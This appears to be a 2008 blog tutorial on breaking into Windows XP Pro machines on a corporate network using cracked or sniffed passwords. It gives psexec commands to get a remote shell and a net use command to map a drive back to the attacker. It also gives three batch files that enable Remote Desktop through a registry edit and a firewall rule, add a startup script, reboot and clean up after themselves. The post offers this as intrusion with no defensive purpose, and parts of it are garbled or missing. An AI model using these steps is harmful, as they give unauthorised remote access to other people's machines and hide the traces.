Thursday, January 24, 2008

Accessing WinXP Pro computers in a corporate environment.

Accessing WinXP Pro computers in a corporate environment.

In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Let’s say you got some windows passwords and cracked them, from my last tutorial.

Or let’s say you got some cleartext passwords from some http stuff and you think that those passwords are the same as the windows passwords.

Typically on corporate machines RDP is enabled but if it isn’t then you can use psexec to get your head in the door.

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this or add psexec to the system path):

psexec \\machinename –u username cmd

It will prompt you for a password which you have conveniently commandeered. Oh and username should be the username not the word. This will start a command prompt on your machine that is actually operating from the other machine. So you have \\machinename ‘s cmd prompt open. You can do any of your normal command prompt stuff from here. PSEXEC has an option for uploading a file when you use it but it is a little tricky. What I do is use the net command to map a drive to your computer from the other computer. Like so:

Net use r: \\breadstick\public /persistant:no

Will map the drive to the computer breadstick’s shared folder named public. So now you can just type.(Remember this is in the other comps cmd not your own)


to access it.

So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.

Make three .bat files in the same directory on a thumb drive:



reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0



netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter



cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat

This will enable remote desktop on that machine so that you may remote into it.

No comments: